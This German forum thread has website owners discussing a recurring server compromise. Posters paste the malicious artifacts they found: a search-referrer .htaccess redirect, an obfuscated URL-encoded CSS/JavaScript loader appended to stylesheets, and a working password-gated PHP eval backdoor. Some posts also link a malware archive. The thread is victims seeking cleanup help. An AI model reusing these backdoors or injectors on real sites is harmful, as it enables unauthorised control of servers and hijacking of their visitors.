Liebe Leute

Seit kurzen 3 Trojaner auf mein Page gehabt
Durch zufall (backup) kammen sie zum vorschein
Aber mein anti-virus Kaspersky hat vernichtet zu glück

Kleiner auszug :
gelöscht: trojanisches Programm Trojan.JS.Redirector.f Datei: D:\Data A\html\backup\Lose-ag\12.02.08---06.53\content\bank\pez\blog.htm
gelöscht: trojanisches Programm Trojan.JS.Redirector.e Datei: D:\Data A\html\backup\Lose-ag\12.02.08---06.53\content\bank\pez\check.js
gelöscht: trojanisches Programm Trojan.JS.Redirector.f Datei: D:\Data A\html\backup\Lose-ag\12.02.08---06.53\content\bank\pez\ex3\t.htm

Habe meinen Webspaceanbiter angesprochen wegen den Trojaner
er sagt mir :

diese PHP-Shell kann nur über ein Script oder ein bekannt gewordenes FTP-Passwort auf dem Server abgelegt worden sein.Ich vermute, dass eines Ihrer Scripte ein include() einer URL erlaubt.

FTP-passwort : ok kann man änder
Scripte ein include() einer URL erlaubt. ????????

Wer kann mir weiter helfen
leider kenne ich mich überhaupt net aus
würde auch in der not bezahlen

Bitte bedanke mich in Voraus für euer hilfe stellung !!!!!!!!!!!!!!!!!!

es gab mal einen Trojaner, wenn du den auf Platte hast und du startest zB dein FTP, schlüpft der durch dein FTP und infiziert alle index-Dateien die er dort findet und zwar ALLE index-Dateien.

Weis nicht ob das der selbe ist, den du jetzt hast.

Man muss den auf der Platte erstmal finden und danach alle index-Dateien "säubern", denn da trägt er einen iFrame ein, meist ganz zu letzt auf der index-Datei.

Mühsame Arbeit dass alles zu entfernen, ich hatte den auch.

es gab mal einen Trojaner, wenn du den auf Platte hast und du startest zB dein FTP, schlüpft der durch dein FTP und infiziert alle index-Dateien die er dort findet und zwar ALLE index-Dateien.

Weis nicht ob das der selbe ist, den du jetzt hast.

Man muss den auf der Platte erstmal finden und danach alle index-Dateien "säubern", denn da trägt er einen iFrame ein, meist ganz zu letzt auf der index-Datei.

Mühsame Arbeit dass alles zu entfernen, ich hatte den auch.

Hallo

ja aber ich haben sie auf der festplatte löscht und lösche auch meine Homepage
spiele sie Viren frei
aber ca. 3 - 4 tag kamm der Tronjaner wieder auf der webspace
das verstehe ich nicht mehr ???
Sicher kann ich mal alle passwörte änder
ob´s was bring ist die ander frage

mfg Web_com

vielleicht erkennt dein antivir den trojaner bei dir auf der platte nicht richtig und er ist dort immer noch, oder er lässt sich nicht so einfach entfernen (siehe rootkit).

die dateien, die von dem trojaner befallen waren, sind das template dateien, die vom script erzeigt werden, oder wenn nicht, von welchem addon kommen diese, oder sind es dateien vom grundscript?

Vielleicht mal ne Art knopix runterladen (sicherheitshalber auf nem anderen Rechner) und saubere Dateien nur mit dem von CD gebooteten System uppen. Dann siehst Du ob es an Deinem System liegt.

vielleicht erkennt dein antivir den trojaner bei dir auf der platte nicht richtig und er ist dort immer noch, oder er lässt sich nicht so einfach entfernen (siehe rootkit).

die dateien, die von dem trojaner befallen waren, sind das template dateien, die vom script erzeigt werden, oder wenn nicht, von welchem addon kommen diese, oder sind es dateien vom grundscript?

Hallo

ich habe die alten backup von meiner homepage durch laufen lassen
da gibt den ordner gar net und keine tronjaner
ausdem war der ordner versteckt (ganz merkwürdig)

wie ich den ordner gelöscht hatte war ein zeit lange auf meiner webspace eine ruhe
bis vorkurzen war er wieder mit den viren da
wie verhext
Ausderm gibt kein 100 % Scripte ohne bugl (fehler)


Vielleicht mal ne Art knopix runterladen (sicherheitshalber auf nem anderen Rechner) und saubere Dateien nur mit dem von CD gebooteten System uppen. Dann siehst Du ob es an Deinem System liegt.

Hy
das hatte ich noch nicht
meine Homepage habe ich schon über 2 jahr
bist jetz gabe es noch nie problem
es wär schade wenn alles von neu beginnen müsst
wäre alles katze

darum bitte umbehilfe weil ich kenne mich nüsse aus

wo kann der fehler liegen !!!

wer könnte mir das erklären (Scripte ein include() einer URL erlaubt. ????????

es wäre toll wenn es einen gab der sich mit auskennt

mfg Web_com

das mit dem include() bezieht sich auf php, in dem es die funktion include() bzw. require() gibt, mit der ein externes script/website (also eine url) eingebunden werden kann, und sollte auf dieser externen seite ein virus sein, so ist dieser auch in deiner seite.
aber nur während der laufzeit (also wenn ein user deine website im browser aufruft), nicht aber in den dateien auf deinem webspace.

wahrscheinlicher ist, dass jemand dein ftp passwort geknackt hat (also passwort regelmäßig ändern!), oder dass deine seite mit templates arbeitet (d.h. die vom php-script generierten seiten werden zwischengespeichert oder alle html teile der seiten werden externe vom php script gespeichert) und in diese dateien ist vom autor der virus eingebaut worden.

wichtig wäre zu wissen, wofür diese dateien da sind, also welche funktion sie in deiner website erfüllen (wozu gehört z.bsp. die *.js datei (javascript) 9

das mit dem include() bezieht sich auf php, in dem es die funktion include() bzw. require() gibt, mit der ein externes script/website (also eine url) eingebunden werden kann, und sollte auf dieser externen seite ein virus sein, so ist dieser auch in deiner seite.
aber nur während der laufzeit (also wenn ein user deine website im browser aufruft), nicht aber in den dateien auf deinem webspace.

wahrscheinlicher ist, dass jemand dein ftp passwort geknackt hat (also passwort regelmäßig ändern!), oder dass deine seite mit templates arbeitet (d.h. die vom php-script generierten seiten werden zwischengespeichert oder alle html teile der seiten werden externe vom php script gespeichert) und in diese dateien ist vom autor der virus eingebaut worden.

wichtig wäre zu wissen, wofür diese dateien da sind, also welche funktion sie in deiner website erfüllen (wozu gehört z.bsp. die *.js datei (javascript) 9

Hallo

endlich einer der sich aus kenne
Danke erst mal !!!!!

Meine homepage erfüllt den zweck einer Bank
Tages zinsen und 3 sparbüchen
aber da komisch ist

Die tronjaner befinden sich immer in den Bank-ordner wurst ob ich in löschen sie und tauchen wieder auf
und mir ist schon auf gefallen fast bei jeden Onder befindet sich .htaccess
Das weiß ich das beutet verschlüsseln
Aber Was ??????

was anders mein anbieter
Hat mir folgens (include() ...) berichtet:

Sofern Sie Ihre Applikation selbst programmieren, sollten Sie darauf achten, sämtliche Parameter die dem Script übergeben werden zu überprüfen, bevor diese bspw. in einem include() benutzt werden.Anderenfalls können Sie per .htaccess und eigener php.ini die Inkludierung von externen Dateien verhindern, indem Sie die Option allow_url_fopen deaktivieren. Einbinden können Sie eine eigene php.ini mit folgender .htacces-Direktive: SetEnv PHPRC /pfad/zur/php_ini Dabei darf lediglich der Pfad, nicht jedoch die php.ini-Datei selbst angegeben werden (ansonsten kann die Datei nicht gefunden werden).

Kann du mit den was anfangen
ich net *g*

Mfg Web_com

1. zu .htaccess dateien:
diese dienen eigentlich nicht dem verschlüsseln, sondern z.bsp. dem verzeichnisschutz mit passwort oder dem schützen von einzelenen dateien vor zugriff, aber auch zum verändern der eingegebenen url (modrewrite) womit sih auch blödsinn anstellen lässt.
generell sind aber htaccess einstellungen "gut" und dienen der sicherheit/userfreundlichkeit.

öffne doch mal die htaccess dateien mit einem texteditor und schau dir die texte darin an, und vergliech die zeilen mit dem was man unter:
http://de.selfhtml.org/servercgi/server/htaccess.htm
nachlesen kann, solltest du dir bei was nicht sicher sein, kannst du es ja hier posten, aber ich denke mal, dass der trojaner nicht durch die htaccess dateien kommt.

2. zum deaktivieren von allow_url_fopen:
solltest du eine schnittstelle benutzen, was du ja sehr wahrscheinlich machst, muss allow_url_fopen aktiviert beliebn, aber das kann dein anbieter ja nicht wissen. daher scheidet diese möglichkeit aus.

3. zu include():
es stimmt, dass durch einbinden von externen inhalten es inbewusst zum einbinden von viren ,schadcode etc. kommen kann, aber dieser wird eigentlich dann nicht in html oder js dateien gespeichert, sondern nur beim user direkt im browser ausgegeben.

sind immer nur diese 3 dateien befallen?:
content\bank\pez\blog.htm
content\bank\pez\check.js
content\bank\pez\ex3\t.htm

desweiteren glaube ich mal nicht, dass es ein alzu schlimmer trojaner ist, wenn sein name auch auf die aktivität schließen lässt (Trojan.JS.Redirector.e), soltle er nur mittels javascript die besucher auf eine andere seite weiterleiten, könnte auch unbewust oder auch gewollt vom programmierer des scriptes/addons eingebaut worden sein.

am besten fragst du auch mal bei diesem nach, von dem du das script/addon für die bank hast.

desweiteren glaube ich mal nicht, dass es ein alzu schlimmer trojaner ist, wenn sein name auch auf die aktivität schließen lässt (Trojan.JS.Redirector.e), soltle er nur mittels javascript die besucher auf eine andere seite weiterleiten, könnte auch unbewust oder auch gewollt vom programmierer des scriptes/addons eingebaut worden sein.


Hallo

ich bin so gescheid und hatte Scripte auf USB-sticket abgespeichter (original)
bevor ich es eingebaut hatte
da gibt es so einen ordner bank\pez\ nicht
Ich habe ihn gelöscht aber er kamm wieder

nagut ich habe den htaccess geöffnet
da stand dieses: # a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearc h|yandex|rambler|aport|mail|gogo|poisk|alltheweb|f ireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|cl ix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keyword s|search_string|search_word|buscar|text|words|su|q t|rdata)\=
RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /content/bank/pez/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
Kann du mit den was anfangen ???

Danke du mir weiter hilfst !!!!!!!!!! *erlich*

Mfg Web_com

okay, dass ist so eine "url-veränderung", sieht kompliziert aus, ist aber eigentlich ganz einfach.

das script überprüft den referer, also wo der besucher vorher war bzw. von welcher seite er einen link zu deiner geklickt hat, darauf, ob diese seite eine der suchmaschienen ist, und dazu noch bestimmte GET paramter (z.bsp. http://de.google.com/index.php?searchfor=klammlose ) aufweist.
was genau die zeile
RewriteCond %{TIME_SEC} <59
soll, verstehe ich nicht, da diese besingung eigentlich immer gegeben ist (also fast immer, da die sekunden der systemzeit bis auf 1 mal immer kleiner als 59 sind, warum schließt er es aus, wenn die sekunden genau bei 59 stehen?? )

so das waren die bedinungen, wenn diese alle gegeben sind (da die satndard verknüpfung AND ist), tritt die rewrite rule in kraft, also:
die neue url ist:
/content/bank/pez/ex3/t.htm
(natürlich mit dem entsprechenden host davor).
die zeile mit dem '#' am anfang ist nur ein kommentar.


wo genau befand sich diese htaccess datei?
da htaccess dateien immer nur für den ordner, in dem sie sich befinden, und alle unterordner gilt.

und der inhalt der datei /content/bank/pez/ex3/t.htm wäre interessant.

wo genau befand sich diese htaccess datei?

Hallo

Die htacces-datei befindet sich
adminforce
\banner (eigene ordner von mir )
cgi-bin
content
crons
css
cubecode
\images
\lib
solt (eigene ordner von mir )
pez

Was mir jetz auf gefallen ist hat einen neuen php-datei angelegt die nennt sich namogofer.php und beträgt 2 kb
beim öffnen scheint nix drinnen zu sein

wenn du möchtest kann ich dir den ordner zukommen
brauche aber deine E-mail adressen
schick mir sie bei PN pleace

Mfg Web_com

Liebe Leute

Seit kurzen 3 Trojaner auf mein Page gehabt
Durch zufall (backup) kammen sie zum vorschein
Aber mein anti-virus Kaspersky hat vernichtet zu glück

Kleiner auszug :
gelöscht: trojanisches Programm Trojan.JS.Redirector.f Datei: D:\Data A\html\backup\Lose-ag\12.02.08---06.53\content\bank\pez\blog.htm
gelöscht: trojanisches Programm Trojan.JS.Redirector.e Datei: D:\Data A\html\backup\Lose-ag\12.02.08---06.53\content\bank\pez\check.js
gelöscht: trojanisches Programm Trojan.JS.Redirector.f Datei: D:\Data A\html\backup\Lose-ag\12.02.08---06.53\content\bank\pez\ex3\t.htm

Habe meinen Webspaceanbiter angesprochen wegen den Trojaner
er sagt mir :

diese PHP-Shell kann nur über ein Script oder ein bekannt gewordenes FTP-Passwort auf dem Server abgelegt worden sein.Ich vermute, dass eines Ihrer Scripte ein include() einer URL erlaubt.

FTP-passwort : ok kann man änder
Scripte ein include() einer URL erlaubt. ????????

Wer kann mir weiter helfen
leider kenne ich mich überhaupt net aus
würde auch in der not bezahlen

Bitte bedanke mich in Voraus für euer hilfe stellung !!!!!!!!!!!!!!!!!!

Das gleiche Problem habe ich auch:

gestern entdecke ich zufällig (bereits das zweite mal), dass meine Suchergebnisse in Google auf eine mir (auf dem ersten Blick) völlig fremde Seite verlinkt. Nachdem ich mir die Adresszeile genauer angesehen habe, musste ich feststellen, dass das zwar meine Domain, aber nicht meine Seite ist.

Ich habe festgestellt, dass mir jemand einen Ordner (Ordnername: asukef) mit 4 Dateien und einen Unterordner (mit einer Datei) untergeschoben hat. Diese Scripte bewirken anscheinend, dass er meine Suchwörter abfängt und in diesen Ordner umleitet ( /asukef/blog.htm)


Hie der Downloadlink zu den Dateien, die ich gelöscht habe

http://212.227.100.58/kuensebeck/asukef.zip

Würde mich freuen, wenn sich das jemand ansehen würde.

Vielen Dank schonmal.

Hier ist eine Seite, wo die Dateien noch nicht gelöscht wurden. So sah meine Seite auch aus.

http://partyzentrum.de/news/flashback/2005-11/ehekafe/blog.htm

die dateien braucht man eigentlich nicht zur lösung des problems, diese lassen eigentlich nur darauf schließen, was den das script macht und was derjenige, der es bei euch eingebaut hat, bezwecken wollte.

wichtiger ist, dass man solche dateien vom webspace löscht und die lücke sucht, wie diese dorthin gekommen sind, damit sowas in zukunft nicht mehr passiert.

also ftp passwort ändern und ein sicheres nehmen, nicht in unverschlüsselten wlans oder öffentlichen netzwerken surfen usw.

dazu kann es sein, dass irgendwo im script fehler sind, z.bsp. wenn ihr ein upload forumlar habt, was nicht genügend abgesichert ist, oder andere lücken.

Inzwischen habe ich herausgefunden, dass alle css und js Dateien befallen sind. In allen Dateien steht folgendes:

/* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63 %75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%4 2%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53% 53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35 %35%36%36%31%3B%20%4A%53%53%33%20%3D%20%27%2F%63%6 8%61%74%2F%62%6F%74%2F%70%72%6F%67%72%61%6D%65%2F% 73%72%63%2F%6C%69%6C%65%72%69%64%2F%64%75%6D%6D%79 %2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%6 4%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C% 65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20 %6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%2 7%73%72%63%27%2C%20%27%2F%63%68%61%74%2F%62%6F%74% 2F%70%72%6F%67%72%61%6D%65%2F%73%72%63%2F%6C%69%6C %65%72%69%64%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%2 0%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28% 27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F %63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%7 4%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64% 27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64 %43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */

Ich habe versucht, alle diese Dateien manuell zu bereinigen. Es sind aber unmengen an js und css Dateien, so dass ich einige übersehen haben muss. Ich habe mal vorhin reingeguckt, der Eintrag ist in allen Dateien wieder drin. Das Passwort hatte ich erst gestern geändert.

also wenn mir sowas passieren würde, würde ichmir mal ernsthaft gedanken machen über die sicherheit des scriptes, des ftp zugangs/hosters.

normalerweise soltle man auschließen können, dass sowas über ftp verändert/hochgeladen wird, da man selber ja das passwort einstellen kann und normalerweise sonst niemand ohne passwort darauf kommt.

außer der anbieter, wo du deine seite hostest, hat selbst extreme sicherheitslücken oder du auf deinem pc, was man aber normalerweise ausschließen kann.

dann käme noch infrage, dass du irgendein upload script oder überhaupt irgendein php script auf deinem webspace hast, mit dem dateienverändert werden können (was beim vms zum beispiel der fall ist im adminforce, die dateien für die ralley texte und die werbung), welches aber unsicher programmiert wurde, und so der angreifer jede beliebige datei auf deinem webspace ändern kann und so seinen code einschleusen!

du solltest daran schnellstens etwas ändern, und deinen anbieter adzu auf jeden fall um suport befragen, aber mit nachdruck um eine schnelle lösung!!

so sollten die, falls es über ftp ist, in den server logs nachlesen können, mit welchen ips auf deienn ftp connected wurde, udn dann kann man deine ip rausfiltern, und wenn dann noch welche überbleiben, weiß man ja was los ist.

dazu soltest du einige dateien "breinigen", und dann jede stunde prüfen, ob schon wieder schadcode darinnen ist, und dann sofort den betriber nach den logs fragen (da sich deine ip ja auch immer mal wieder ändert, muss so ein vergleich dann schnell passieren).

ansonsten kannst du auf alle dateien über ftp erstmal nur lesen rechte setzen, also nicht 777 für ordner und auch nicht 66 für dateien.

Hallo

ich war schon lang nicht mehr in forum
Frage wer kennt sich mit einer PHP-Datei aus
ich habe am server eine datei wenn ich die datei lösche erscheint sie immer wieder


Die datei muss eine bedeutung haben
wer kennt sich mit so etwas aus ich kann es euch gerne zukommen lassen
Vieleicht könnt ihr mir sagen was es auf sich hat

Das wäre toll

Mfg WEb_com

wie die kommt imemr wieder?
dirket nach dem du sie gelöscht hast oder erst einige minuten später?
welchen inhalt hat diese datei?
in welchem ordner befindet sich diese?

was sagt dein webspace-anbieter dazu?

wie die kommt imemr wieder?
dirket nach dem du sie gelöscht hast oder erst einige minuten später?
welchen inhalt hat diese datei?
in welchem ordner befindet sich diese?

was sagt dein webspace-anbieter dazu?

Hallo

Die nennt sich namogofer.php
wenn ich sie öffne ist nichts drinnen ich schätze es ist versteckt (nicht lesbar)
ich habe sie zwei wochen beobachtet (homepage)

Das erste was ich machte ist passwort von FTP ändern (10 stellig)
dann setzte ich die homepage eine woche auf wartemodus
Da pasierte nix
In der zweiten woche ging sie wieder auf online für jederman zugänglich
und dann kann die Data namogofer.ph
das heist irgend wo ist eine Sicherheitslücke die geschlossen werden muss
aber wo ??
Mein Anbider ist Artfiles.de

ich hoffe du kannst was anfangen

Mfg Web_com

also die datei enthält folgendes:
<?php

error_reporting(1);

global $HTTP_SERVER_VARS;

function say($t) { echo "$t\n"; };

function testdata($t) { say(md5("testdata_$t")); };

echo "<pre>"; testdata('start');

if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){

if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }
else
{ testdata('f'); }; }
else
{ testdata('pass'); };

testdata('end');

echo "</pre>"; ?>


ist auf jeden fall keine beabsichtigte datei, nur woran es liegt, dass diese ih immer wieder erstellt, kann ih schlecht sagen, dass kann ja nicht an der datei selber liegen, sondern nur an anderen dateien und sicherheitslücken usw.
sowas kann man nicht aus der "entfernung" sagen, dazu muss man direkt ftp zugang haben, um alles mal durchschauen zu können, und genau mitverfolgen, wann und wie die datei nach dem löschen wieder entsteht.

dazu kontaktiere einfach deinen webspace anbieter, und wenn dir die nict weiterhelfen können, hilft wahrscheinlich nur alles komplett löschen, udn von vorne wiedr aufspielen, oder mit dem virus/schadscript leben.
sorry, aber da kann ich nichts für dich machen.

hallo
ich werde alles von neu beginn
2 jahre für die katze
Danke das du dir das anschau hast

Mfg Web_com

naja, so schlimm ist der code wohl nicht, denk dass das mehr in die richtung ad-ware geht, also dass der code nur irgendwelche seitenaufrufe woanders hin umleitet oder so.

ich würde vor der radikalmethode erst noch den support vom webspace anbieter kontaktieren, vielleicht wissen die was.

Hallo
des problem hat ich schon wie am anfang geschilder Berichtet
wegen meinen Anbieter

macht nix ein versuch wars wert
Danke für dein bemühung

mfg Web_com

Bin neu hier, also erst mal Hallo zusammen.

Hatte/Habe dasselbe Problem und eine Lösung für Zwischendurch gefunden. Normalerweise legt der Trojaner immer einen gleichen Ordner an (bei mir war das jedenfalls so). In diesem Ordner befinden sich dann mehrere Unterordner und Dateien. Außerdem fand ich zur gleichen Zeit immer eine .httaccess-Datei auf meinem Rootverzeichnis. Mittlerweile habe ich das Problem vorläufig im Griff. Ich habe den entsprechenden Ordner gelöscht, dann einen gleichnamigen leeren Ordner erstellt und diesem Ordner keine Rechte zugewiesen. Das verhindert alle Versuche, diesen
Ordner zu erstellen und darin herumzumanipulieren. Seitdem habe ich Ruhe. Mit den CSS-Dateien sollte man ebenso verfahren: nur Leserechte vergeben, dann kann da i.d.R. nichts passieren. Und es funzt ja trotzdem.

Auch wenn das Thema hier schon abgearbeitet ist, hilft das vielleicht dem einen oder der anderen. Ansonsten: nix für ungut ...

Bin neu hier, also erst mal Hallo zusammen.

Hatte/Habe dasselbe Problem und eine Lösung für Zwischendurch gefunden. Normalerweise legt der Trojaner immer einen gleichen Ordner an (bei mir war das jedenfalls so). In diesem Ordner befinden sich dann mehrere Unterordner und Dateien. Außerdem fand ich zur gleichen Zeit immer eine .httaccess-Datei auf meinem Rootverzeichnis. Mittlerweile habe ich das Problem vorläufig im Griff. Ich habe den entsprechenden Ordner gelöscht, dann einen gleichnamigen leeren Ordner erstellt und diesem Ordner keine Rechte zugewiesen. Das verhindert alle Versuche, diesen
Ordner zu erstellen und darin herumzumanipulieren. Seitdem habe ich Ruhe. Mit den CSS-Dateien sollte man ebenso verfahren: nur Leserechte vergeben, dann kann da i.d.R. nichts passieren. Und es funzt ja trotzdem.

Auch wenn das Thema hier schon abgearbeitet ist, hilft das vielleicht dem einen oder der anderen. Ansonsten: nix für ungut ...

Hallo

Ja sicher
am besten keine passwörter hergeben
auch net mal wenn es ein so genanter programier ist
Ich habe einmal den fehler gemacht und die homepage ging dann in den bach hinunter
leider musst ich meine Homepage ganz von neuen beginnen es ist viel arbeit und zeit

Danke nochmal für deinen rat schlag

Mfg Web_com

Hallo
ich bin entsetz
hab von ganz neuen begonnen und von märz bis april war ein ruhre
und schau zufälliger weise auf meiner homepage und entdeckte den Backdoor.PHP.Small.s
das ist zu ärgen
leider kann man nix macht dagegen
schade muss selber den fehler finden

Habe das gleiche Problem, als harmlos würde ich es nicht abtun er logt das EF PW in einer Textdatei was weiterpassiert kann ich noch nicht genau sagen.

Bei mir hat sich der Böse junge in der Shoutbox angelegt (kann nur in Ordner die Schreibrechte haben) mit dem namen vuloga.php desweiteren mit einem ordner niloqa dieser enthält die html Datei t.html und den ordner h dieser enthält die Datein nejuma.txt und eine htaccess.

Hier übersichtlicher :
Irgendein Ordner mit schreibrechten/

vuloga.php (namen sind hier schall und rauch)
/niloqa/t.html
/niloqa/h/nejuma.txt
/niloqa/h/.htaccess

die datein enthalten :
niloqa/t.html
EF Passwort (md5 hash)

/niloqa/h/nejuma.txt
EF Passwort (md5 hash)

/niloqa/h/.htaccess
RewriteEngine On
RewriteRule ^.*$ nejuma.txt [L]


Die PHP datei vuloga.php
kann ich im moment noch nicht sagen muß mir erst eine sanbox installieren um die zu öffnen

mfg
markus

Hallo
ist wurst wie es handhaben dust
er kommt wenn er weis wo eine sicherheitlücke ist
vielleicht liege die sicherheitslücke beim webspace anbieter und er weis noch net *g*
ab best einen neu domain anmelden